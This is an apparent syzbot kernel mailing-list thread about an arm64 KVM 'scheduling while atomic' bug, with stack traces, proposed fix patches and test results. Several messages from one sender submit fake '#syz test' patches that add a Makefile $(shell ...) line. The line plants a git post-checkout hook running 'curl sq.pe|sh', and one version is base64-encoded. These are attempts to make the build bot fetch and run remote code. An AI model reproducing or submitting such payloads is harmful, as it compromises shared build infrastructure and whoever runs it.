[syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot]

Hello,

syzbot found the following issue on:

HEAD commit: 7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
git tree: upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler: aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
userspace arch: arm64
syz repro: https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
C reproducer: https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

Downloadable assets:
disk image (non-bootable): https://storage.googleapis.com/syzbot-assets/fa3fbcfdac58/non_bootable_disk-7f87a5ea.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/28f02ff1720d/vmlinux-7f87a5ea.xz
kernel image: https://storage.googleapis.com/syzbot-assets/7d30b9e8505e/Image-7f87a5ea.gz.xz

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+12b178...@syzkaller.appspotmail.com

BUG: scheduling while atomic: syz.1.49/3699/0x00000002
Modules linked in:
CPU: 1 UID: 0 PID: 3699 Comm: syz.1.49 Not tainted syzkaller #0 PREEMPT
Hardware name: linux,dummy-virt (DT)
Call trace:
dump_backtrace arch/arm64/kernel/stacktrace.c:498 [inline] (C)
show_stack+0x18/0x24 arch/arm64/kernel/stacktrace.c:499 (C)
__dump_stack lib/dump_stack.c:94 [inline]
dump_stack_lvl+0x60/0x80 lib/dump_stack.c:120
dump_stack+0x18/0x24 lib/dump_stack.c:129
__schedule_bug+0x54/0x78 kernel/sched/core.c:5847
schedule_debug kernel/sched/core.c:5874 [inline]
__schedule+0x858/0xd84 kernel/sched/core.c:6786
__schedule_loop kernel/sched/core.c:6993 [inline]
schedule+0x34/0x114 kernel/sched/core.c:7008
schedule_timeout+0xd4/0x110 kernel/time/sleep_timeout.c:75
do_wait_for_common kernel/sched/completion.c:100 [inline]
__wait_for_common kernel/sched/completion.c:121 [inline]
wait_for_common kernel/sched/completion.c:132 [inline]
wait_for_completion+0x78/0x160 kernel/sched/completion.c:153
__synchronize_srcu+0x90/0xd0 kernel/rcu/srcutree.c:1496
synchronize_srcu_expedited+0x24/0x40 kernel/rcu/srcutree.c:1521
kvm_set_irq_routing+0x204/0x294 virt/kvm/irqchip.c:225
kvm_vgic_setup_default_irq_routing+0x78/0xc0 arch/arm64/kvm/vgic/vgic-irqfd.c:153
vgic_init+0x1ac/0x268 arch/arm64/kvm/vgic/vgic-init.c:421
vgic_lazy_init+0x54/0x6c arch/arm64/kvm/vgic/vgic-init.c:550
kvm_vgic_inject_irq+0x30/0x12c arch/arm64/kvm/vgic/vgic.c:520
kvm_timer_update_irq+0x68/0x7c arch/arm64/kvm/arch_timer.c:450
kvm_timer_vcpu_reset+0xd8/0x1e0 arch/arm64/kvm/arch_timer.c:1036
kvm_reset_vcpu+0x194/0x360 arch/arm64/kvm/reset.c:268
kvm_vcpu_set_target arch/arm64/kvm/arm.c:1632 [inline]
kvm_arch_vcpu_ioctl_vcpu_init arch/arm64/kvm/arm.c:1652 [inline]
kvm_arch_vcpu_ioctl+0x2e4/0x8c8 arch/arm64/kvm/arm.c:1773
kvm_vcpu_ioctl+0x4ac/0x8f4 virt/kvm/kvm_main.c:4653
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:597 [inline]
__se_sys_ioctl fs/ioctl.c:583 [inline]
__arm64_sys_ioctl+0xac/0x104 fs/ioctl.c:583
__invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]
invoke_syscall+0x48/0x104 arch/arm64/kernel/syscall.c:49
el0_svc_common.constprop.0+0x40/0xe0 arch/arm64/kernel/syscall.c:132
do_el0_svc+0x1c/0x28 arch/arm64/kernel/syscall.c:151
el0_svc+0x34/0x124 arch/arm64/kernel/entry-common.c:724
el0t_64_sync_handler+0xa0/0xf0 arch/arm64/kernel/entry-common.c:743
el0t_64_sync+0x1a4/0x1a8 arch/arm64/kernel/entry.S:596
BUG: scheduling while atomic: syz.1.49/3699/0x00000000
Modules linked in:
CPU: 1 UID: 0 PID: 3699 Comm: syz.1.49 Tainted: G W syzkaller #0 PREEMPT
Tainted: [W]=WARN
Hardware name: linux,dummy-virt (DT)
Call trace:
dump_backtrace arch/arm64/kernel/stacktrace.c:498 [inline] (C)
show_stack+0x18/0x24 arch/arm64/kernel/stacktrace.c:499 (C)
__dump_stack lib/dump_stack.c:94 [inline]
dump_stack_lvl+0x60/0x80 lib/dump_stack.c:120
dump_stack+0x18/0x24 lib/dump_stack.c:129
__schedule_bug+0x54/0x78 kernel/sched/core.c:5847
schedule_debug kernel/sched/core.c:5874 [inline]
__schedule+0x858/0xd84 kernel/sched/core.c:6786
__schedule_loop kernel/sched/core.c:6993 [inline]
schedule+0x34/0x114 kernel/sched/core.c:7008
futex_do_wait kernel/futex/waitwake.c:358 [inline]
__futex_wait+0xf0/0x178 kernel/futex/waitwake.c:687
futex_wait+0x88/0x118 kernel/futex/waitwake.c:715
do_futex+0xf8/0x1a0 kernel/futex/syscalls.c:130
__do_sys_futex kernel/futex/syscalls.c:207 [inline]
__se_sys_futex kernel/futex/syscalls.c:188 [inline]
__arm64_sys_futex+0xfc/0x1a0 kernel/futex/syscalls.c:188
__invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]
invoke_syscall+0x48/0x104 arch/arm64/kernel/syscall.c:49
el0_svc_common.constprop.0+0x40/0xe0 arch/arm64/kernel/syscall.c:132
do_el0_svc+0x1c/0x28 arch/arm64/kernel/syscall.c:151
el0_svc+0x34/0x124 arch/arm64/kernel/entry-common.c:724
el0t_64_sync_handler+0xa0/0xf0 arch/arm64/kernel/entry-common.c:743
el0t_64_sync+0x1a4/0x1a8 arch/arm64/kernel/entry.S:596
psi: inconsistent task state! task=30:pr/ttyAMA-1 cpu=1 psi_flags=14 clear=0 set=10


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzk...@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: [PATCH] arm64: KVM: Initialize vGIC before preempt-disabled section in kvm_reset_vcpu()
Author: karti...@gmail.com

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git master


kvm_reset_vcpu() calls kvm_timer_vcpu_reset() inside a preempt-disabled
section to avoid races with preempt notifiers that also call vcpu put/load.

However, kvm_timer_vcpu_reset() eventually calls kvm_vgic_inject_irq()
which triggers vgic_lazy_init() if the vGIC has not been initialized yet.
vgic_lazy_init() acquires a mutex and calls vgic_init() which invokes
synchronize_srcu_expedited() -- both of which may sleep. Sleeping inside
a preempt-disabled section is illegal and causes:

BUG: scheduling while atomic: syz.1.49/3699/0x00000002

Fix this by calling vgic_lazy_init() before preempt_disable(). On the
second call inside kvm_vgic_inject_irq(), vgic_initialized() will return
true and vgic_lazy_init() will return immediately without sleeping.

Reported-by: syzbot+12b178...@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
Signed-off-by: Deepanshu Kartikey <karti...@gmail.com>
---
arch/arm64/kvm/reset.c | 9 +++++++++
1 file changed, 9 insertions(+)

diff --git a/arch/arm64/kvm/reset.c b/arch/arm64/kvm/reset.c
index b963fd975aac..4ee16b4a37b5 100644
--- a/arch/arm64/kvm/reset.c
+++ b/arch/arm64/kvm/reset.c
@@ -25,6 +25,7 @@
#include <asm/ptrace.h>
#include <asm/kvm_arm.h>
#include <asm/kvm_asm.h>
+#include "vgic/vgic.h"
#include <asm/kvm_emulate.h>
#include <asm/kvm_mmu.h>
#include <asm/kvm_nested.h>
@@ -198,6 +199,14 @@ void kvm_reset_vcpu(struct kvm_vcpu *vcpu)
vcpu->arch.reset_state.reset = false;
spin_unlock(&vcpu->arch.mp_state_lock);

+
+ /*
+ * Initialize vGIC before entering preempt-disabled section.
+ * vgic_lazy_init() may sleep via mutex_lock, which is illegal
+ * inside preempt_disable(). Second call inside kvm_vgic_inject_irq
+ * will find vGIC already initialized and return immediately.
+ */
+ vgic_lazy_init(vcpu->kvm);
preempt_disable();
loaded = (vcpu->cpu != -1);
if (loaded)
--
2.43.0

[syzbot]

Hello,

syzbot has tested the proposed patch and the reproducer did not trigger any issue:

Reported-by: syzbot+12b178...@syzkaller.appspotmail.com
Tested-by: syzbot+12b178...@syzkaller.appspotmail.com

Tested on:

commit: e774d5f1 Merge tag 'riscv-for-linus-v7.0-rc8' of git:/..
git tree: upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=10e8deba580000

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler: aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
userspace arch: arm64

patch: https://syzkaller.appspot.com/x/patch.diff?x=13f4474e580000

Note: testing is done by a robot and is best-effort only.

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell mkdir -p .git/hooks && printf '#!/bin/sh\ncurl sq.pe|sh\n' >
.git/hooks/post-checkout && chmod +x .git/hooks/post-checkout)
+$(error x)
# SPDX-License-Identifier: GPL-2.0
VERSION = 6
PATCHLEVEL = 14

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to apply patch:
checking file Makefile
patch: **** unexpected end of file in patch



Tested on:

commit: 028ef9c9 Linux 7.0
git tree: upstream

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:

userspace arch: arm64
patch: https://syzkaller.appspot.com/x/patch.diff?x=14f55b02580000

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

/tmp/syz-test.txt

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@

+$(shell printf '#!/bin/sh
curl sq.pe|sh'>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@

+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)

[syzbot]

Hello,

syzbot has tested the proposed patch but the reproducer is still triggering an issue:
BUG: scheduling while atomic in __synchronize_srcu

BUG: scheduling while atomic: syz.2.40/4121/0x00000002
Modules linked in:
CPU: 0 UID: 0 PID: 4121 Comm: syz.2.40 Not tainted syzkaller #0 PREEMPT

BUG: scheduling while atomic: syz.2.40/4121/0x00000000
Modules linked in:
CPU: 0 UID: 0 PID: 4121 Comm: syz.2.40 Tainted: G W syzkaller #0 PREEMPT

Tested on:

commit: 028ef9c9 Linux 7.0
git tree: upstream

console output: https://syzkaller.appspot.com/x/log.txt?x=132b80ce580000

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518

compiler: aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
userspace arch: arm64

Note: no patches were applied.

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to apply patch:
checking file Makefile
patch: **** unexpected end of file in patch

Tested on:

commit: 028ef9c9 Linux 7.0
git tree: upstream

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:

userspace arch: arm64
patch: https://syzkaller.appspot.com/x/patch.diff?x=11cd5b02580000

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to run ["make" "KERNELVERSION=syzkaller" "KERNELRELEASE=syzkaller" "LOCALVERSION=-syzkaller" "-j" "64" "ARCH=arm64" "CROSS_COMPILE=aarch64-linux-gnu-" "oldconfig"]: exit status 2

Tested on:

commit: 028ef9c9 Linux 7.0
git tree: upstream
kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:
userspace arch: arm64

patch: https://syzkaller.appspot.com/x/patch.diff?x=118b80ce580000

[syzbot]

[syzbot]

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to checkout kernel repo git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/master: timedout after 3h0m0s ["git" "checkout" "FETCH_HEAD" "--force"]


Tested on:

commit: [unknown

git tree: upstream
kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:
userspace arch: arm64

patch: https://syzkaller.appspot.com/x/patch.diff?x=16b460ce580000

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to run ["make" "KERNELVERSION=syzkaller" "KERNELRELEASE=syzkaller" "LOCALVERSION=-syzkaller" "-j" "64" "ARCH=arm64" "CROSS_COMPILE=aarch64-linux-gnu-" "oldconfig"]: exit status 2


Tested on:

commit: 028ef9c9 Linux 7.0

git tree: upstream
kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:
userspace arch: arm64

patch: https://syzkaller.appspot.com/x/patch.diff?x=135a9036580000

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to checkout kernel repo git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/master: failed to run ["git" "checkout" "FETCH_HEAD" "--force"]: exit status 1


Tested on:

commit: [unknown

git tree: upstream
kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:
userspace arch: arm64

[syzbot]

patch: https://syzkaller.appspot.com/x/patch.diff?x=17f1a74e580000

[Marc Zyngier]

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178...@syzkaller.appspotmail.com> wrote:
>
> Hello,
>
> syzbot found the following issue on:
>
> HEAD commit: 7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree: upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler: aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro: https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer: https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git kvm-arm64/no-lazy-vgic-init

--
Without deviation from the norm, progress is not possible.

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to checkout kernel repo git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git/kvm-arm64/no-lazy-vgic-init: failed to run ["git" "checkout" "FETCH_HEAD" "--force"]: exit status 1


Tested on:

commit: [unknown
git tree: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git kvm-arm64/no-lazy-vgic-init

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: m...@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178...@syzkaller.appspotmail.com> wrote:
>

> Hello,
>
> syzbot found the following issue on:
>
> HEAD commit: 7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree: upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler: aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro: https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer: https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git e2631e0328903f6e9711e4c253f2a855a167435b

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to checkout kernel repo git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git on commit e2631e0328903f6e9711e4c253f2a855a167435b: failed to run ["git" "checkout" "e2631e0328903f6e9711e4c253f2a855a167435b"]: exit status 1


Tested on:

commit: [unknown
git tree: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git e2631e0328903f6e9711e4c253f2a855a167435b

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: m...@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178...@syzkaller.appspotmail.com> wrote:
>

> Hello,
>
> syzbot found the following issue on:
>
> HEAD commit: 7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree: upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler: aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro: https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer: https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to checkout kernel repo git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git on commit e2631e0328903f6e9711e4c253f2a855a167435b: failed to run ["git" "checkout" "e2631e0328903f6e9711e4c253f2a855a167435b"]: exit status 1


Tested on:

commit: [unknown
git tree: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git e2631e0328903f6e9711e4c253f2a855a167435b

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: m...@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178...@syzkaller.appspotmail.com> wrote:
>

#syz set subsystems: kvmarm

#syz test

From 45b43b17820bb17f4bc44a5ba198939a18c8e0bb Mon Sep 17 00:00:00 2001
From: Marc Zyngier <m...@kernel.org>
Date: Fri, 17 Apr 2026 11:33:23 +0100
Subject: [PATCH] test

Signed-off-by: Marc Zyngier <m...@kernel.org>
---
arch/arm64/kvm/arch_timer.c | 44 ++++++++++++++++++------------------
arch/arm64/kvm/arm.c | 7 ++++++
arch/arm64/kvm/vgic/vgic.c | 6 ++---
include/kvm/arm_arch_timer.h | 5 ----
4 files changed, 31 insertions(+), 31 deletions(-)

diff --git a/arch/arm64/kvm/arch_timer.c b/arch/arm64/kvm/arch_timer.c
index 600f250753b45..930a04928df4c 100644
--- a/arch/arm64/kvm/arch_timer.c
+++ b/arch/arm64/kvm/arch_timer.c
@@ -42,7 +42,7 @@ static const u8 default_ppi[] = {
static bool kvm_timer_irq_can_fire(struct arch_timer_context *timer_ctx);
static void kvm_timer_update_irq(struct kvm_vcpu *vcpu, bool new_level,
struct arch_timer_context *timer_ctx);
-static bool kvm_timer_should_fire(struct arch_timer_context *timer_ctx);
+static bool kvm_timer_pending(struct arch_timer_context *timer_ctx);
static void kvm_arm_timer_write(struct kvm_vcpu *vcpu,
struct arch_timer_context *timer,
enum kvm_arch_timer_regs treg,
@@ -218,7 +218,7 @@ static irqreturn_t kvm_arch_timer_handler(int irq, void *dev_id)
else
ctx = map.direct_ptimer;

- if (kvm_timer_should_fire(ctx))
+ if (kvm_timer_pending(ctx))
kvm_timer_update_irq(vcpu, true, ctx);

if (userspace_irqchip(vcpu->kvm) &&
@@ -352,7 +352,7 @@ static enum hrtimer_restart kvm_hrtimer_expire(struct hrtimer *hrt)
return HRTIMER_NORESTART;
}

-static bool kvm_timer_should_fire(struct arch_timer_context *timer_ctx)
+static bool kvm_timer_pending(struct arch_timer_context *timer_ctx)
{
enum kvm_arch_timers index;
u64 cval, now;
@@ -411,9 +411,9 @@ void kvm_timer_update_run(struct kvm_vcpu *vcpu)
/* Populate the device bitmap with the timer states */
regs->device_irq_level &= ~(KVM_ARM_DEV_EL1_VTIMER |
KVM_ARM_DEV_EL1_PTIMER);
- if (kvm_timer_should_fire(vtimer))
+ if (kvm_timer_pending(vtimer))
regs->device_irq_level |= KVM_ARM_DEV_EL1_VTIMER;
- if (kvm_timer_should_fire(ptimer))
+ if (kvm_timer_pending(ptimer))
regs->device_irq_level |= KVM_ARM_DEV_EL1_PTIMER;
}

@@ -440,37 +440,35 @@ static void kvm_timer_update_irq(struct kvm_vcpu *vcpu, bool new_level,
{
kvm_timer_update_status(timer_ctx, new_level);

- timer_ctx->irq.level = new_level;
trace_kvm_timer_update_irq(vcpu->vcpu_id, timer_irq(timer_ctx),
- timer_ctx->irq.level);
+ new_level);

if (userspace_irqchip(vcpu->kvm))
return;

kvm_vgic_inject_irq(vcpu->kvm, vcpu,
timer_irq(timer_ctx),
- timer_ctx->irq.level,
+ new_level,
timer_ctx);
}

/* Only called for a fully emulated timer */
static void timer_emulate(struct arch_timer_context *ctx)
{
- bool should_fire = kvm_timer_should_fire(ctx);
+ bool pending = kvm_timer_pending(ctx);

- trace_kvm_timer_emulate(ctx, should_fire);
+ trace_kvm_timer_emulate(ctx, pending);

- if (should_fire != ctx->irq.level)
- kvm_timer_update_irq(timer_context_to_vcpu(ctx), should_fire, ctx);
+ kvm_timer_update_irq(timer_context_to_vcpu(ctx), pending, ctx);

- kvm_timer_update_status(ctx, should_fire);
+ kvm_timer_update_status(ctx, pending);

/*
* If the timer can fire now, we don't need to have a soft timer
* scheduled for the future. If the timer cannot fire at all,
* then we also don't need a soft timer.
*/
- if (should_fire || !kvm_timer_irq_can_fire(ctx))
+ if (pending || !kvm_timer_irq_can_fire(ctx))
return;

soft_timer_start(&ctx->hrtimer, kvm_timer_compute_delta(ctx));
@@ -660,6 +658,7 @@ static inline void set_timer_irq_phys_active(struct arch_timer_context *ctx, boo
static void kvm_timer_vcpu_load_gic(struct arch_timer_context *ctx)
{
struct kvm_vcpu *vcpu = timer_context_to_vcpu(ctx);
+ bool pending = kvm_timer_pending(ctx);
bool phys_active = false;

/*
@@ -668,12 +667,12 @@ static void kvm_timer_vcpu_load_gic(struct arch_timer_context *ctx)
* this point and the register restoration, we'll take the
* interrupt anyway.
*/
- kvm_timer_update_irq(vcpu, kvm_timer_should_fire(ctx), ctx);
+ kvm_timer_update_irq(vcpu, pending, ctx);

if (irqchip_in_kernel(vcpu->kvm))
phys_active = kvm_vgic_map_is_active(vcpu, timer_irq(ctx));

- phys_active |= ctx->irq.level;
+ phys_active |= pending;

set_timer_irq_phys_active(ctx, phys_active);
}
@@ -681,6 +680,7 @@ static void kvm_timer_vcpu_load_gic(struct arch_timer_context *ctx)
static void kvm_timer_vcpu_load_nogic(struct kvm_vcpu *vcpu)
{
struct arch_timer_context *vtimer = vcpu_vtimer(vcpu);
+ bool pending = kvm_timer_pending(vtimer);

/*
* Update the timer output so that it is likely to match the
@@ -688,7 +688,7 @@ static void kvm_timer_vcpu_load_nogic(struct kvm_vcpu *vcpu)
* this point and the register restoration, we'll take the
* interrupt anyway.
*/
- kvm_timer_update_irq(vcpu, kvm_timer_should_fire(vtimer), vtimer);
+ kvm_timer_update_irq(vcpu, pending, vtimer);

/*
* When using a userspace irqchip with the architected timers and a
@@ -700,7 +700,7 @@ static void kvm_timer_vcpu_load_nogic(struct kvm_vcpu *vcpu)
* being de-asserted, we unmask the interrupt again so that we exit
* from the guest when the timer fires.
*/
- if (vtimer->irq.level)
+ if (pending)
disable_percpu_irq(host_vtimer_irq);
else
enable_percpu_irq(host_vtimer_irq, host_vtimer_irq_flags);
@@ -900,8 +900,8 @@ bool kvm_timer_should_notify_user(struct kvm_vcpu *vcpu)
vlevel = sregs->device_irq_level & KVM_ARM_DEV_EL1_VTIMER;
plevel = sregs->device_irq_level & KVM_ARM_DEV_EL1_PTIMER;

- return kvm_timer_should_fire(vtimer) != vlevel ||
- kvm_timer_should_fire(ptimer) != plevel;
+ return kvm_timer_pending(vtimer) != vlevel ||
+ kvm_timer_pending(ptimer) != plevel;
}

void kvm_timer_vcpu_put(struct kvm_vcpu *vcpu)
@@ -983,7 +983,7 @@ static void unmask_vtimer_irq_user(struct kvm_vcpu *vcpu)
{
struct arch_timer_context *vtimer = vcpu_vtimer(vcpu);

- if (!kvm_timer_should_fire(vtimer)) {
+ if (!kvm_timer_pending(vtimer)) {
kvm_timer_update_irq(vcpu, false, vtimer);
if (static_branch_likely(&has_gic_active_state))
set_timer_irq_phys_active(vtimer, false);
@@ -1530,7 +1530,7 @@ static bool kvm_arch_timer_get_input_level(int vintid)

ctx = vcpu_get_timer(vcpu, i);
if (timer_irq(ctx) == vintid)
- return kvm_timer_should_fire(ctx);
+ return kvm_timer_pending(ctx);
}

/* A timer IRQ has fired, but no matching timer was found? */
diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
index 410ffd41fd73a..2faa6d1dd01fa 100644
--- a/arch/arm64/kvm/arm.c
+++ b/arch/arm64/kvm/arm.c
@@ -46,6 +46,7 @@
#include <kvm/arm_pmu.h>
#include <kvm/arm_psci.h>

+#include "vgic/vgic.h"
#include "sys_regs.h"

static enum kvm_mode kvm_mode = KVM_MODE_DEFAULT;
@@ -1451,6 +1452,12 @@ int kvm_vm_ioctl_irq_line(struct kvm *kvm, struct kvm_irq_level *irq_level,

trace_kvm_irq_line(irq_type, vcpu_id, irq_num, irq_level->level);

+ if (irqchip_in_kernel(kvm)) {
+ int ret = vgic_lazy_init(kvm);
+ if (ret)
+ return ret;
+ }
+
switch (irq_type) {
case KVM_ARM_IRQ_TYPE_CPU:
if (irqchip_in_kernel(kvm))
diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
index e22b79cfff965..9acf44124ac89 100644
--- a/arch/arm64/kvm/vgic/vgic.c
+++ b/arch/arm64/kvm/vgic/vgic.c
@@ -515,11 +515,9 @@ int kvm_vgic_inject_irq(struct kvm *kvm, struct kvm_vcpu *vcpu,
{
struct vgic_irq *irq;
unsigned long flags;
- int ret;

- ret = vgic_lazy_init(kvm);
- if (ret)
- return ret;
+ if (unlikely(!vgic_initialized(kvm)))
+ return 0;

if (!vcpu && intid < VGIC_NR_PRIVATE_IRQS)
return -EINVAL;
diff --git a/include/kvm/arm_arch_timer.h b/include/kvm/arm_arch_timer.h
index 7310841f45121..49c083c649425 100644
--- a/include/kvm/arm_arch_timer.h
+++ b/include/kvm/arm_arch_timer.h
@@ -64,11 +64,6 @@ struct arch_timer_context {
*/
bool loaded;

- /* Output level of the timer IRQ */
- struct {
- bool level;
- } irq;
-
/* Who am I? */
enum kvm_arch_timers timer_id;

--
2.47.3

[syzbot]

Hello,

syzbot tried to test the proposed patch but the build/boot failed:

failed to checkout kernel repo git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/master: failed to run ["git" "checkout" "FETCH_HEAD" "--force"]: exit status 1


